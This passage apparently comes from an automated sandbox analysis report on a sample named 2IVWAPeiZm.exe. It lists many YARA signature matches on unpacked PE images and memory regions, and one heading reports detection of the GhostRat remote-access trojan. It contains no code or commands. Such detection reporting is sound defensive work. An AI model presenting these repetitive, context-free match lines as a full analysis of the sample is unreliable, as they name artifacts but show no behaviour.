                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.48.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.33.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92170ad.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb95b06d1.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.49.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba432c61.53.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.44.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.29.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.45.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba385181.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb94711a5.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.37.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.44.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.20.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.34.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.38.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.30.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba432c61.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.34.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.35.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba310721.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9600000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9600000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.45.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb924647d.50.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.47.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.48.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.39.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba34ac51.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba3bec61.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.40.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.27.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.49.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.33.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.47.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.20.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0ab6a1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.43.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.40.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb95b06d1.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb94711a5.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.27.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0ab6a1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba3bec61.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba432c61.53.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.23.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.51.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.37.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.31.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.51.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba310721.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.35.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.42.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.21.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9531116.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9531116.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.29.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.24.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.31.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.46.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.30.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.43.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3706740100.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726196823.000001CFB9241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748764856.000001CFB924D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820150176.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368802529.000001CFB923B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748942831.000001CFB9250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368874986.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919845681.000001CFBA3F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820582683.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748764856.000001CFB9216000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1797698380.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3900454177.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726241114.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726279645.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3900337582.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629229655.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820366657.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181430469.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181505839.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919777549.000001CFB9246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2285716468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113319605.000001CFBA3BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629266568.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1925226889.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2453865521.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113072764.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919809789.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3006787705.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112427817.000001CFB9470000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2453718670.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3535968647.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1925169796.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181469055.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107170872.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629153864.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368840828.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107104468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113319605.000001CFBA310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 2IVWAPeiZm.exe PID: 7272, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected GhostRat
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba34ac51.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb924647d.50.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.21.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba385181.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba432c61.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.42.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.39.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.38.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923b8cd.32.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92413ed.41.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.46.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.48.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.33.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92170ad.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb95b06d1.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.49.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba432c61.53.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.44.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.29.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.45.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba385181.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb94711a5.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.37.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.44.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.20.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.34.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.38.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.30.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba432c61.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.34.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.35.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba310721.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9600000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9600000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.45.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb924647d.50.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.47.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.48.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.39.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba34ac51.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba3bec61.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.40.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.27.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.49.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.33.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.47.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.20.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0ab6a1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.43.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.40.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb95b06d1.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.12.raw.unpack, type: UNPACKEDPE
